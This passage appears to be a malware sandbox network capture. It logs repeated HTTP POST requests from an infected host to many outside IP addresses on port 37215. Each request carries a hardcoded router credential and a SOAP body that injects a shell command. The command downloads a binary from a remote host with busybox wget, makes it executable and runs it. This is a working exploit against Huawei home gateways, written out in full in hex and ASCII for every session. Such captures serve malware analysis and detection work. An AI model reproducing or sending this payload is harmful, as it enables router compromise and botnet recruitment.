                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1080192.168.2.153927641.226.48.1137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172688007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1081192.168.2.155542441.230.32.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172786951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1082192.168.2.154297041.65.36.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172833920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1083192.168.2.155979441.53.169.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172878027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1084192.168.2.155291241.80.87.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172894955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1085192.168.2.154092441.182.24.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172924042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1086192.168.2.155038441.131.200.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172946930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1087192.168.2.154890441.177.162.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172975063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1088192.168.2.155213841.101.140.14637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173002958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1089192.168.2.154284041.145.214.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173032999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
